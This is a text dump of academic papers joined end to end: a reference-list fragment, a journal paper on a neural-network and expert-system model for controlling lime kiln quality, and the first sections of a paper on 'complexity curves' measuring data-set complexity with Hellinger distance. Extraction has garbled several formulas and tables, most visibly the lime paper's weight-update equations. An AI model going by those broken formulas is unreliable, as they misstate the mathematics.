2008. Tao Zhuang and Chengqing Zong. 2010a. A Minimum Error Weighting Combination Strategy for Chinese Se- mantic Role Labeling. In Proceedings of COLING 2010. Tao Zhuang and Chengqing Zong. 2010b. Joint Inference for Bilingual Semantic Role Labeling. In Proceedings of EMNLP 2010. 282 work_57rrnauwwnbp3hjv4m5ye6kck4 ---- Your Paper's Title Starts Here: International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 83 Application of Improved BP Neural Network in Hybrid Control Model of Lime Quality Lingli Zhu * College of Information Technology Luoyang Normal University Luoyang, 471934, China e-mail: zhulinglils@163.com Tingzhong Wang College of Information Technology Luoyang Normal University Luoyang, 471934, China Abstract—In this paper, a method of combining neural network with expert system is proposed, which can realize the control model of real time feedback and control parameters. The model is based on the parameters of production condition, and the current lime quality is predicted. Through the quality of lime and control parameters, using association rule base of expert system, reasoning that lime control parameter adjustment, timely feedback to the lime production control system, to achieve the purpose of real-time control of the quality of lime. The paper presents application of improved BP neural network in hybrid control model of lime quality. Keywords-Improved Neural Network; Lime; Expert System; BP; Hybrid Control I. INTRODUCTION The production control process of the rotary kiln is the production of high quality lime under the premise of stable output. The automatic control system of lime rotary kiln can control the quality of the product by controlling the operation of the fuel quantity, air quantity, and equipment. However, the quality of lime can not be obtained in real time, and the production control system can not get the product quality information in time [1]. At present, the control system of lime rotary kiln is the main technology workers. Through the process system on-line monitoring state parameters to predict the current product quality, and it is as the basis for the adjustment of control parameters. The quality of products is greatly influenced by artificial judgment or off-line detection. In this paper, the ability of the neural network is used to deal with the nonlinear mapping problem, and the quality of the product is predicted based on the on-line monitoring state parameters. Combined with experience of experts in the field and the production of large amounts of data knowledge mining association rules from database and matching products quality prediction results and adjusting control parameters, obtained the lime rotary kiln control parameter correction information, lime rotary kiln control system for product quality of real time pre measurement and accurate feedback adjustment of intelligent control. II. MODEL AND KEY TECHNOLOGY OF PRODUCT QUALITY CONTROL OF LIME ROTARY KILN The product quality control model flow chart of lime rotary kiln is shown in figure 1. The data preprocessing module receives data from the automatic control system of the lime rotary kiln and the data stored in the database. And then the product quality prediction model is activated according to the preset time interval. Forecast to the product quality and the quality of the pre - set quality information. To maintain the original control parameter information and you meet the requirements. If not up to meet the requirements, combined with the control parameters and product quality information, through association rules base matching control to adjust the parameters of, and feedback to the automatic control system of lime rotary kiln. The activity of the product can be reduced by the lime burning or over burning, but the burning and burning of the lime is completely different from the operation, so it is necessary to distinguish the state of the lime. Secondly, the different chemical composition of raw material production of lime activity difference is very big, the different raw material must have the corresponding product quality requirements. Therefore, in order to make a correct judgment, the quality of the product must be compared with the corresponding product quality setting. BP neural network is composed of input layer (X), hidden layer (H) and output layer (Z). The hidden layer (H) can be one or more layers, and the article chooses only one layer of hidden layer of neural network [2]. For the three layer BP neural network, the hidden layer node number can be determined by using the following formula. p m n   Where: m is the input layer node number, n is the output layer node number, P is the hidden layer node number. BP neural network is a kind of iterative algorithm for the forward propagation of data and the error back propagation. The input signal propagates through the activation function to the hidden layer, and the hidden layer nodes are transmitted to the output layer by the activation function. By calculating output between neurons and the expected output error, in accordance with the negative gradient of error modify the weight of each layer, error signal along the path to the original return, to calculate the output, as is shown by figure1, until the error achieve ideal value. DOI: 10.21307/ijanmc-2019-025 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 84 Figure 1. Flow chart of control mode Lime rotary kiln control system online condition monitoring parameters (x) many, some reflect the process of production condition parameters of the system, some safety protection monitoring parameters, more two features in both. According to the actual production experience, exhaust gas temperature (x1), the tail of the kiln temperature (x2), kiln pressure (x3), secondary air temperature (x4), feed temperature (x5) are reflected lime quality is the most significant factor. The control parameters (Y) of the lime rotary kiln are essentially determined by the quality of the product. Including fuel consumption (Y1), rotary kiln rotation speed (Y2), the main exhaust fan (Y3) and other control parameters is the product quality of the decisive parameters. Product quality information (Z) contains the lime activity (z1) and the (z2) [3][4][5]. First, it is the higher the activity of lime, the better the quality of the product. In the ideal state, there is no maximum level of activity of the lime, which has the highest degree of burning or burning. In the process of production of lime rotary kiln, there are inevitable abnormal conditions, such as mechanical equipment failure, monitoring equipment abnormal and so on will cause the distortion of online detection data. If you do not filter out the data, it will cause the system model to send out the wrong instruction, affecting the normal operation of the system. For this kind of abnormal data points to take filtering, mean filling and other means to ensure the accuracy and integrity of the data. III. CONSTRUCTION OF EXPERT SYSTEM RULE BASE Prediction to the quality of the product is not ideal, the need to adjust the control parameters to achieve the purpose of product quality control. Through the neural network prediction period of product quality information model is obtained, and presupposition information after comparing the parameters ( 1 1 1 j j z z z   , 2 j z ) and control parameters ( 1 2 3 , , j j j y y y ) as the association rule premise, matching the amount of correction of the control parameters as output item ( 1 2 3, , j j j y y y   ), then optimized control parameters in the next time interval for: 1j j j n n n y y y     （，，） BP neural network algorithm is as follows: (1)Initialization. In the form (2), the value of the license is randomly assigned to the initial value of the network, setting the number of learning times N and calculating precision. (2)A study sample K input and the corresponding expected output. (3)The output value of I node is calculated.     m ai a 1 k k i a i h f x            (4) J node output value of the output layer.     j i 1 o p k k i j i z f h            (5) Calculating the weights between the output layer and the hidden layer.      1 +1 1 +1i j i1 + k kN N N N N N i i b h b            Which is the learning rate, B is the additional momentum. The value of the judgment is determined by the formula (3) and (4) [6]. (6) Calculating the weights between the hidden layer and the input layer. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 85      1 +1 1 +1ai i a1 + k kN N N N N N ai ai b x b            (7)Judgment. Sample not read, jump second steps. Otherwise the next step. (8)According to the corrected formula weights (5) (6), fixed weights. The output of each layer is calculated by the formula (7). (9)To calculate the global error.      2K n 1 j 1 1 2K k k j j k E z zo      (10)Judgment. Does the error reach the design accuracy or exceed the maximum number of training sessions, and then the error is. No, then make N=N++, return second steps. The model association rule mining algorithm using OLAP and Apriori algorithm, to find the relationship between product quality information and control parameters adjustment. Product quality information and control parameters of the association rules mining, with the help of the production process by the control parameters to adjust the information on the quality of the product data. On-line analytical processing technology is the main tool of data analysis in data warehouse. The OLAP system uses the data storage scheme of materialized data cube, in exchange for the space cost for time efficiency. For association rule mining, a large amount of intermediate data which is used in the mining process may already be materialized in the data cube and not need to be re calculated. IV. RUNNING EXAMPLES OF NEURAL NETWORK FORECAST MODEL Sample data is from a steel mill Nissan 800 tons of lime rotary kiln production line. The enterprise product quality detection is per hour from the sampling hole sampling time, artificial naked eye observation quality of products; sampling every 3 hours on the quality of the products by experimental method determination of a, so the sample selection experimental measurement data shall prevail. Select the normal operation of the equipment in the case of 30 days and 240 data for the sample, of which 120 were used as training samples, 40 as a test sample, as is shown by table1. TABLE I. SAMPLE NO. The temperat ure of exhaust gas （℃） The temperat ure of inlet （℃） The pressure of inlet （Pa） The temperat ure of the second air （℃） The temperat ure of product （℃） Activity （ml） Product state 1 280 1009 -57.78 536 171 360 Over-burn ed 2 286 1014 -23.64 625 143 351 Over-burn ed 3 273 983 -25.54 630 95 335 under-bur ned … … … … … … … … 116 270 949 -39.46 578 155 329 under-bur ned 117 261 954 7.42 571 134 353 under-bur ned 118 282 1002 -51.04 630 127 365 Over-burn ed 119 267 967 -20.32 547 109 344 under-bur ned 120 282 1006 -55.68 628 152 357 Over-burn ed … … … … … … … … 159 286 996 -12.5 627 141 354 under-bur ned 160 274 949 -12.01 597 112 341 under-bur ned Definition1: The sum rule for the attribute values of the same attribute in the 1 N dimensional data is as follows: Let SUM=Attribute.Value1+Attribute.Value2 If Attribute.Value1 is not empty and Attribute.Value1==Attribute.Value2, then SUM=N+1; If Attribute.Value1 is null and Attribute.Values2 is not empty, or Attribute.Value1 is not empty and Attribute.Value2 is empty, then SUM=1; In other cases, SUM=0. The rule can be used to determine whether the 2 frequent attribute sets satisfy the connection conditions. To judge two k-item frequent attribute set Trans1 and Trans2 whether that International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 86 satisfies the join condition, and Trans2 Trans1 the corresponding added and all the sum of the results accumulated the resulting value to result. Write n for the number of fields in the data table, if Result= (n + 1) (k-1) + 2, and Trans2 Trans1 a (k-1) of non null attribute values are the same, two attribute values are different, and different two attribute values and are 1. That was non null attribute value and attribute values are added. At this point, Trans1 and Trans2 meet the connection conditions, can be connected operation. Otherwise, Trans1 and Trans2 can not be connected operation. The 2 meet the connection conditions of frequent sets Trans1 and Trans2, can be achieved by the "add" connection operation. In order to carry out the operation of the frequent attribute set, the "or" rule of the value of the attribute is defined first. From the production site, the use of the quality control system before and after 1 month of the 240 measured lime activity contrast as shown in Figure 2. 320 325 330 335 340 345 350 355 360 365 370 375 380 0 1 4 2 8 4 2 5 6 7 0 8 4 9 8 1 1 2 1 2 6 1 4 0 1 5 4 1 6 8 1 8 2 1 9 6 2 1 0 2 2 4 2 3 8 The sample A c t i v i ty After Before Figure 2. The contrast of product quality before and after used the system From Figure 2 it can be seen that the use of the quality control system, the average lime activity is about 370ml, compared with the previous product, the average 340ml level has greatly improved. In addition to the specific time period, the change of the activity of the lime is kept within 10ml, which indicates that the stability of the lime production system is greatly improved. V. CONCLUSION This paper presents a combination of neural network and association rule library based on lime rotary kiln products quality prediction and control parameters feedback control model can be in line completed the accurate prediction of the quality of the products and to achieve timely control parameter adjusting information feedback. In the control model, the process of reading and processing the data of the state parameter is added to improve the robustness of the control model, and reduce the influence of equipment failure on the system stability. ACKNOWLEDGEMENTS This paper is supported by Science and technology project of Henan Province (152102210123, 142102210475). REFERENCES [1] Liu Xiao-li, Wang Shen-tao, Dai Rui, Wei Shi-feng, “On fault diagnosis of net work based on improved particle swarm optimization”, Computer applications and software, vol.28, no.1, (2011),pp.207-209. [2] Wang Cheng-liang,Pang Xu,Lu ZHi-jian, “Research on hybrid control methods of aluminium reduction on neural network”, Application Research of Computer, vol.27,no.7, (2010),pp.2536-2539. [3] Li Dao-zhong,ZHang Lei,Wu ZHao-hui, “Test method of physical metallurgical lime, Bei Jing:Metallurgical Industry Press,(2005),pp.1-5. [4] Chu Hui, Lai Hui-cheng, “An improved back-propagation N algoriythm and its application”, Computer simulation,vol.24, no.4, (2007), pp.75-111. [5] Shi ZHong-zhi, “Knowledge discovery”,Bei jing:Tsinghua University press, (2002),pp.8-9. [6] Zhang Lei, Hu Chun, Qian Feng, “Research progress of BP algorithm for local minimum problem”, The industrial control computer, vol.17,no.9, (2004),pp.33-50. work_5brlhve5rrfp5k3ki4c4vyrm2i ---- Submitted 9 March 2016 Accepted 4 July 2016 Published 8 August 2016 Corresponding author Dariusz M. Plewczynski, dariuszplewczynski@gmail.com Academic editor Jaume Bacardit Additional Information and Declarations can be found on page 29 DOI 10.7717/peerj-cs.76 Copyright 2016 Zubek and Plewczynski Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Complexity curve: a graphical measure of data complexity and classifier performance Julian Zubek1,2 and Dariusz M. Plewczynski1 1 Centre of New Technologies, University of Warsaw, Warsaw, Poland 2 Institute of Computer Science, Polish Academy of Sciences, Warsaw, Poland ABSTRACT We describe a method for assessing data set complexity based on the estimation of the underlining probability distribution and Hellinger distance. In contrast to some popular complexity measures, it is not focused on the shape of a decision boundary in a classification task but on the amount of available data with respect to the attribute structure. Complexity is expressed in terms of graphical plot, which we call complexity curve. It demonstrates the relative increase of available information with the growth of sample size. We perform theoretical and experimental examination of properties of the introduced complexity measure and show its relation to the variance component of classification error. We then compare it with popular data complexity measures on 81 diverse data sets and show that it can contribute to explaining performance of specific classifiers on these sets. We also apply our methodology to a panel of simple benchmark data sets, demonstrating how it can be used in practice to gain insights into data characteristics. Moreover, we show that the complexity curve is an effective tool for reducing the size of the training set (data pruning), allowing to significantly speed up the learning process without compromising classification accuracy. The associated code is available to download at: https://github.com/zubekj/complexity_curve (open source Python implementation). Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Data Mining and Machine Learning Keywords Learning curves, Data complexity, Data pruning, Hellinger distance, Bias-variance decomposition, Performance measures INTRODUCTION It is common knowledge in machine learning community that the difficulty of classification problems varies greatly. Sometimes it is enough to use a simple out-of-the-box classifier to get a very good result and sometimes careful preprocessing and model selection are needed to get any non-trivial result at all. The difficulty of a classification task clearly stems from certain properties of the data set, yet we still have problems with defining those properties in general. Bias–variance decomposition (Domingos, 2000) demonstrates that the error of a predic- tor can be attributed to three sources: bias, coming from the inability of an algorithm to build an adequate model for the relationship present in data; variance, coming from the inability to estimate correct model parameters from an imperfect data sample; and the How to cite this article Zubek and Plewczynski (2016), Complexity curve: a graphical measure of data complexity and classifier perfor- mance. PeerJ Comput. Sci. 2:e76; DOI 10.7717/peerj-cs.76 https://peerj.com mailto:dariuszplewczynski@gmail.com mailto:dariuszplewczynski@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.76 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://github.com/zubekj/complexity_curve http://dx.doi.org/10.7717/peerj-cs.76 irreducible error component commonly called noise. Following this line of reasoning, the difficulty of a classification problem may come partly from the complexity of the relation between dependent variable and explanatory variables, partly from the scarcity of infor- mation in the training sample, and partly from class ambiguity (due to noise in the target variable or an overlap between classes). This is identical to sources of classification difficulty identified by Ho & Basu (2002), who labelled the three components: ‘complex decision boundary,’ ‘small sample size and dimensionality induced sparsity’ and ‘ambiguous classes.’ In this article, we introduce a new measure of data complexity targeted at sample sparsity, which is mostly associated with variance error component. We aim to measure information saturation of a data set without making any assumptions on the form of the relation between dependent variable and the rest of variables, so explicitly disregarding shape of the decision boundary and classes ambiguity (e.g., caused by noise on the target variable). Our complexity measure takes into account the number of samples, the number of attributes, and the internal structure of attributes under a simplifying assumption of attribute independence. The key idea is to check how well a data set can be approximated by its subsets. If the probability distribution induced by a small data sample is very similar to the probability distribution induced by the whole data set, we say that the set is saturated with information and presents an opportunity to learn the relationship between variables without promoting the variance. To operationalise this notion, we introduce two kinds of plots: • Complexity curve—a plot presenting how well subsets of growing size approximate distribution of attribute values. It is a basic method applicable to clustering, regression and classification problems. • Conditional complexity curve—a plot presenting how well subsets of growing size approximate conditional distribution of attribute values given class. It is applicable to classification problems and more robust against class imbalance or differences in attributes structure between classes. Since the proposed measure characterise the data sample itself without making any assumptions as to how that sample will be used, it should be applicable to all kinds of problems involving reasoning from data. In this work, we focus on classification tasks since this is the context in which data complexity measures were previously applied. We compare the area under the complexity curve with popular data complexity measures and show how it complements the existing metrics. We also demonstrate that it is useful for explaining classifier performance by showing that the area under the complexity curve is correlated with the area under the receiver operating characteristic (AUC ROC) for popular classifiers tested on 81 benchmark data sets. We propose an immediate application of the developed method connected with the fundamental question: how large data sample is needed to build a successful predictor? We pursue this topic by proposing a data pruning strategy based on complexity curve and evaluating it on large data sets. We show that it can be considered as an alternative to progressive sampling strategies (Provost, Jensen & Oates, 1999). Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 2/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 RELATED LITERATURE The problem of measuring data complexity in the context of machine learning is broadly discussed. Our beliefs are similar to those of Ho (2008), who stated the need for including data complexity analysis in algorithm comparison procedures. Similar needs are also discussed in fields outside machine learning; for example, in combinatorial optimisation (Smith-Miles & Lopes, 2012). The general idea is to select a sufficiently diverse set of problems to demonstrate both strengths and weaknesses of the analysed algorithms. The importance of this step was stressed by Macià et al. (2013), who demonstrated how algorithm comparison may be biased by benchmark data set selection, and showed how the choice may be guided by complexity measures. Characterising problem space with some metrics makes it possible to estimate regions in which certain algorithms perform well (Luengo & Herrera, 2013), and this opens up possibilities of meta-learning (Smith-Miles et al., 2014). In this context, complexity measures are used not only as predictors of classifier performance but, more importantly, as diversity measures capturing various properties of the data sets. It is useful when the measures themselves are diverse and focus on different aspects of the data to give as complete characterisation of the problem space as possible. In the later part of the article we demonstrate that complexity curve fits well into the landscape of currently used measures, offering new insights into data characteristics. A set of practical measures of data complexity with regard to classification was introduced by Ho & Basu (2002), and later extended by Ho, Basu & Law (2006) and Orriols-Puig, Macià & Ho (2010). It is routinely used in tasks involving classifier evaluation (Macià et al., 2013; Luengo & Herrera, 2013) and meta-learning (Diez-Pastor et al., 2015; Mantovani et al., 2015). Some of these measures are based on the overlap of values of specific attributes; examples include Fisher’s discriminant ratio, volume of overlap region, attribute efficiency etc. The others focus directly on class separability; this group includes measures such as the fraction of points on the decision boundary, linear separability, the ratio of intra/inter class distance. In contrast to our method, such measures focus on specific properties of the classification problem, measuring shape of the decision boundary and the amount class overlap. Topological measures concerned with data sparsity, such as ratio of attributes to observations, attempt to capture similar properties as our complexity curve. Li & Abu-Mostafa (2006) defined data set complexity in the context of classification using the general concept of Kolmogorov complexity. They proposed a way to measure data set complexity using the number of support vectors in support vector machine (SVM) classifier. They analysed the problems of data decomposition and data pruning using above methodology. A graphical representation of the data set complexity called the complexity-error plot was also introduced. The main problem with their approach is the selection of very specific and complex machine learning algorithms, which may render the results in less universal way, and which are prone to biases specific to SVMs. This make their method unsuitable for diverse machine learning algorithms comparison. Another approach to data complexity is to analyse it on the level of individual instances. This kind of analysis is performed by Smith, Martinez & Giraud-Carrier (2013), who Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 3/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 attempted to identify which instances are misclassified by various classification algorithm. They devised local complexity measures calculated with respect to single instances and later tried to correlate average instance hardness with global data complexity measures of Ho & Basu (2002). They discovered that it is mostly correlated with class overlap. This makes our work complementary, since in our complexity measure we deliberately ignore class overlap and individual instance composition to isolate another source of difficulty, namely data scarcity. Yin et al. (2013) proposed a method of feature selection based on Hellinger distance (a measure of similarity between probability distributions). The idea was to choose features, which conditional distributions (depending on the class) have minimal affinity. In the context of our framework, this could be interpreted as measuring data complexity for single features. The authors demonstrated experimentally that, for the high-dimensional imbalanced data sets, their method is superior to popular feature selection methods using Fisher criterion, or mutual information. DEFINITIONS In the following sections, we define formally all measures used throughout the paper. Basic intuitions, assumptions, and implementation choices are discussed. Finally, algorithms for calculating complexity curve, conditional complexity curve, and generalisation curve are given. Measuring data complexity with samples In a typical machine learning scenario, we want to use information contained in a collected data sample to solve a more general problem which our data describe. Problem complexity can be naturally measured by the size of a sample needed to describe the problem accurately. We call the problem complex, if we need to collect a lot of data in order to get any results. On the other hand, if a small amount of data suffices, we say the problem has low complexity. How to determine if a data sample describes the problem accurately? Any problem can be described with a multivariate probability distribution P of a random vector X. From P we sample our finite data sample D. Now, we can use D to build the estimated probability distribution of X–PD. PD is the approximation of P. If P and PD are identical, we know that data sample D describes the problem perfectly and collecting more observations would not give us any new information. Analogously, if PD is very different from P we can be almost certain that the sample is too small. To measure similarity between probability distributions we use Hellinger distance. For two continuous distributions P and PD with probability density functions p and pD it is defined as: H2(P,PD)= 1 2 ∫ (√ p(x)− √ pD(x) )2 dx. The minimum possible distance 0 is achieved when the distributions are identical, the maximum 1 is achieved when any event with non-zero probability in P has probability 0 in PD and vice versa. Simplicity and naturally defined 0–1 range make Hellinger distance a good measure for capturing sample information content. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 4/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 In most cases, we do not know the underlining probability distribution P representing the problem and all we have is a data sample D, but we can still use the described complexity measure. Let us picture our data D as the true source of knowledge about the problem and the estimated probability distribution PD as the reference distribution. Any subset S⊂D can be treated as a data sample and a probability distribution PS estimated from it will be an approximation of PD. By calculating H2(PD,PS) we can assess how well a given subset represent the whole available data, i.e., determine its information content. Obtaining a meaningful estimation of a probability distribution from a data sample poses difficulties in practice. The probability distribution we are interested in is the joint probability on all attributes. In that context, most of the realistic data sets should be regarded as extremely sparse, and naïve probability estimation using frequencies of occurring values would result in mostly flat distribution. This can be called the curse of dimensionality. Against this problem, we apply a naïve assumption that all attributes are independent. This may seem like a radical simplification but, as we will demonstrate later, it yields good results in practice and constitute a reasonable baseline for common machine learning techniques. Under the independence assumption we can calculate the joint probability density function f from the marginal density functions f1,...,fn: f (x)= f1(x1)f2(x2)...fn(xn). We will now show the derived formula for Hellinger distance under the independence assumption. Observe that the Hellinger distance for continuous variables can be expressed in another form: 1 2 ∫ (√ f (x)− √ g(x) )2 dx = 1 2 ∫ ( f (x)−2 √ f (x)g(x)+g(x) ) dx = 1 2 ∫ f (x) dx− ∫ √ f (x)g(x) dx+ 1 2 ∫ g(x) dx =1− ∫ √ f (x)g(x) dx. In the last step we used the fact the that the integral of a probability density over its domain must equal one. We will consider two multivariate distributions F and G with density functions: f (x1,...,xn)= f1(x1)...fn(xn) g(x1,...,xn)=g1(x1)...gn(xn). The last formula for Hellinger distance will now expand: 1− ∫ ··· ∫ √ f (x1,...,xn)g(x1,...,xn)dx1...dxn =1− ∫ ··· ∫ √ f1(x1)...fn(xn)g1(x1)...gn(xn)dx1...dxn =1− ∫ √ f1(x1)g1(x1) dx1... ∫ √ fn(xn)gn(xn) dxn. In this form, variables are separated and parts of the formula can be calculated separately. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 5/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Practical considerations Calculating the introduced measure of similarity between data set in practice poses some difficulties. First, in the derived formula direct multiplication of probabilities occurs, which leads to problems with numerical stability. We increased the stability by switching to the following formula: 1− ∫ √ f1(x1)g1(x1) dx1... ∫ √ fn(xn)gn(xn) dxn =1− ( 1− 1 2 ∫ (√ f1(x1)− √ g1(x1) )2 dx1 ) ... ( 1− 1 2 ∫ (√ fn(xn)− √ gn(xn) )2 dx2 ) =1− ( 1−H2(F1,G1) ) ... ( 1−H2(Fn,Gn) ) . For continuous variables probability density function is routinely done with kernel density estimation (KDE)—a classic technique for estimating the shape continuous probability density function from a finite data sample (Scott, 1992). For a sample (x1,x2,...,xn) estimated density function has a form: f̂h(x)= 1 nh n∑ i=1 K ( x−xi h ) where K is the kernel function and h is a smoothing parameter –bandwidth. In our experiments we used Gaussian function as the kernel. This is a popular choice, which often yields good results in practice. The bandwidth was set according to the modified Scott’s rule (Scott, 1992): h= 1 2 n− 1 d+4 , where n is the number of samples and d number of dimensions. In many cases, the independence assumption can be supported by preprocessing input data in a certain way. A very common technique, which can be applied in this situation is the whitening transform. It transforms any set of random variables into a set of uncorrelated random variables. For a random vector X with a covariance matrix 6 a new uncorrelated vector Y can be calculated as follows: 6=PDP−1 W =PD− 1 2 P−1 Y =XW where D is diagonal matrix containing eigenvalues and P is matrix of right eigenvectors of 6. Naturally, lack of correlation does not imply independence but it nevertheless reduces the error introduced by our independence assumption. Furthermore, it blurs the difference between categorical variables and continuous variables putting them on an equal footing. In all further experiments, we use whitening transform preprocessing and then treat all variables as continuous. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 6/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 A more sophisticated method is a signal processing technique known as Independent Component Analysis (ICA) (Hyvärinen & Oja, 2000). It assumes that all components of an observed multivariate signal are mixtures of some independent source signals and that the distribution of the values in each source signal is non-Gaussian. Under these assumption, the algorithm attempts to recreate the source signals by splitting the observed signal into the components as independent as possible. Even if the assumptions are not met, ICA technique can reduce the impact of attributes interdependencies. Because of its computational complexity, we used it as an optional step in our experiments. Machine learning task difficulty Our data complexity measure can be used for any type of problem described through a multivariate data sample. It is applicable to regression, classification and clustering tasks. The relation between the defined data complexity and the difficulty of a specific machine learning task has to be investigated. We will focus on the supervised learning case. Classification error will be measured as mean 0–1 error (accuracy). Data complexity will be measured as mean Hellinger distance between the real and the estimated probability distributions of attributes conditioned on the target variable: 1 m m∑ i=1 H2(P(X|Y =yi),PD(X|Y =yi)) where X—vector of attributes, Y —target variable, y1,y2,...ym—values taken by Y . It has been shown that error of an arbitrary classification or regression model can be decomposed into three parts: Error=Bias+Variance+Noise. Domingos (2000) proposed an universal scheme of decomposition, which can be adapted for different loss functions. For a classification problem and 0–1 loss L expected error on sample x for which the true label is t, and the predicted label given a training set D is y can be expressed as: ED,t[1(t 6=y)] =1(Et[t] 6=ED[y]) + c2ED[1(y 6=ED[y])] + c1Et[1(t 6=Et[t])] =B(x) + c2V (x) + c1N(x) where B—bias, V —variance, N—noise. Coefficients c1 and c2 are added to make the decomposition consistent for different loss functions. In this case, they are equal to: c1=PD(y =Et[t])−PD(y 6=Et[t])Pt (y = t |Et[t] 6= t) c2= { 1 if Et[t]=ED[y] −PD(y =Et[t] |y 6=ED[y]) otherwise. Bias comes from an inability of the applied model to represent the true relation present in data, variance comes from an inability to estimate the optimal model parameters from the Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 7/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 data sample, the noise is inherent to the solved task and irreducible. Since our complexity measure is model agnostic, it clearly does not include bias component. As it does not take into account the dependent variable, it cannot measure noise either. All that is left to investigate is the relation between our complexity measure and variance component of the classification error. The variance error component is connected with overfitting, when the model fixates over specific properties of a data sample and looses generalisation capabilities over the whole problem domain. If the training sample represented the problem perfectly and the model was fitted with perfect optimisation procedure, variance would be reduced to zero. The less representative the training sample is for the whole problem domain, the larger the chance for variance error. This intuition can be supported by comparing our complexity measure with the error of the Bayes classifier. We will show that they are closely related. Let Y be the target variable taking on values v1,v2,...,vm, fi(x) an estimation of P(X =x|Y =vi) from a finite sample D, and g(y) an estimation of P(Y =y). In such a setting, 0–1 loss of the Bayes classifier on a sample x with the true label t is: 1(t 6=y)=1 ( t 6=argmaxi ( g(vi)fi(x) )) . Let assume that t =vj. Observe that: vj =argmax i ( g(vi)fi(x) ) ⇔∀ig(vj)fj(x)−g(vi)fi(x)≥0 which for the case of equally frequent classes reduces to: ∀ifj(x)−fi(x)≥0. We can simultaneously add and subtract term P(X =x |Y =vj)−P(X =x |Y =vi) to obtain: ∀i ( fj(x)−P(X =x |Y =vj) ) + ( P(X =x |Y =vi)−fi(x) ) + ( P(X =x |Y =vj)−P(X =x |Y =vi) ) ≥0. We know that P(X =x|Y =vj)−P(X =x|Y =vi)≥0, so as long as estimations fi(x), fj(x) do not deviate too much from real distributions the inequality is satisfied. It will not be satisfied (i.e., an error will take place) only if the estimations deviate from the real distributions in a certain way (i.e., fj(x)P(X =x|Y =vi)) and the sum of these deviations is greater than P(X =x|Y =vj)−P(X =x|Y =vi). The Hellinger distance between fi(x) and P(X =x|Y =vi) measures the deviation. This shows that by minimising Hellinger distance we are also minimising error of the Bayes classifier. The converse may not be true: not all deviations of probability estimates result in classification error. In the introduced complexity measure, we assumed independency of all attributes, which is analogous to the assumption of naïve Bayes. Small Hellinger distance between Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 8/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 class-conditioned attribute distributions induced by sets A and B means that naïve Bayes trained on set A and tested on set B will have only very slight variance error component. Of course, if the independence assumption is broken bias error component may still be substantial. Complexity curve Complexity curve is a graphical representation of a data set complexity. It is a plot presenting the expected Hellinger distance between a subset and the whole set versus subset size: CC(n)=E[H2(P,Qn)] where P is the empirical probability distribution estimated from the whole set and Qn is the probability distribution estimated from a random subset of size n≤|D|. Let us observe that CC(|D|)=0 because P =Q|D|. Q0 is undefined, but for the sake of convenience we assume CC(0)=1. Algorithm 1 Procedure for calculating complexity curve. D – original data set, K – number of random subsets of the specified size. 1. Transform D with whitening transform and/or ICA to obtain DI . 2. Estimate probability distribution for each attribute of DI and calculate joint probabil- ity distribution – P. 3. For i in 1...|DI| (with an optional step size d): (a) For j in 1...K : i. Draw subset Sji ⊆DI such that |S j i|= i. ii. Estimate probability distribution for each attribute of Sji and calculate joint probability distribution – Qji. iii. Calculate Hellinger distance: lji =H 2(P,Qji). (b) Calculate mean mi and standard error si: mi= 1 K K∑ j=1 lji si= √√√√ 1 K K∑ j=1 ( mi−l j i )2 Complexity curve is a plot of mi±si vs i. To estimate complexity curve in practice, for each subset size K random subsets are drawn and the mean value of Hellinger distance, along with standard error, is marked on the plot. The Algorithm 1 presents the exact procedure. Parameters K (the number of samples of a specified size) and d (sampling step size) control the trade-off between the precision of the calculated curve and the computation time. In all experiments, unless stated otherwise, we used values K =20, d = |D|60 . Regular shapes of the obtained curves did not suggest the need for using larger values. Figure 1 presents a sample complexity curve (solid lines). It demonstrates how by drawing larger subsets of the data we get better approximations of the original distribution, as indicated by the decreasing Hellinger distance. The logarithmic decrease of the distance Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 9/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Figure 1 Complexity curve (solid) and conditional complexity curve (dashed) for iris data set. is characteristic: it means that with a relatively small number of samples we can recover general characteristics of the distribution, but to model the details precisely we need a lot more data points. The shape of the curve is very regular, with just minimal variations. It means that the subset size has a far greater impact on the Hellinger distance that the composition of the individual subsets. The shape of the complexity curve captures the information on the complexity of the data set. If the data is simple, it is possible to represent it relatively well with just a few instances. In such case, the complexity curve is very steep at the beginning and flattens towards the end of the plot. If the data is complex, the initial steepness of the curve is smaller. That information can be aggregated into a single parameter—the area under the complexity curve (AUCC). If we express the subset size as the fraction of the whole data set, then the value of the area under the curve becomes limited to the range [0,1] and can be used as an universal measure for comparing complexity of different data sets. Conditional complexity curve The complexity curve methodology presented so far deals with the complexity of a data set as a whole. While this approach gives information about data structure, it may assess complexity of the classification task incorrectly. This is because data distribution inside each of the classes may vary greatly from the overall distribution. For example, when the number of classes is larger, or the classes are imbalanced, a random sample large enough to represent the whole data set may be too small to represent some of the classes. To take this into account, we introduce conditional complexity curve. We calculate it by splitting each data sample according to the class value and taking the arithmetic mean of the complexities of each sub-sample. presents the exact procedure. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 10/32 